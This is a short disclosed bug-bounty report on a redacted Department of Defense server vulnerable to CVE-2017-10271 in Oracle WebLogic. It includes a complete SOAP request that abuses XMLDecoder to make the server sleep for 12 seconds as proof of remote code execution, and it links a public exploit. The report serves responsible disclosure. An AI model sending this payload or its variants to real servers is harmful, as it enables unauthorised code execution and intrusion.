RCE on █████ via CVE-2017-10271
This issue took 3 Days and 18 hours to triage and 22 Days and 0 hours to resolve once triaged.
Discovered by erbbysam on Deptofdefense
Summary: Happy Friday! The server at
██████is vulnerable to CVE-2017-10271 "Oracle WebLogic Server Remote Command Execution".
Description: The following request takes 12 seconds (12000 milliseconds) to complete:
POST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1 Host: ██████████ Content-Length: 423 content-type: text/xml Accept-Encoding: gzip, deflate, compress Accept: */* <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java class="java.beans.XMLDecoder"> <object class="java.lang.Thread" method="sleep"> <long>12000</long> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
This proves that I have Java code execution on the remote server.
Public exploits for this exist: https://github.com/c0mmand3rOpSec/CVE-2017-10271 I was not able to use that script with a
pingcommand, which might have been blocked by preventing outbound connections.
Suggested Mitigation/Remediation Actions
Patch & possibly don't allow external access.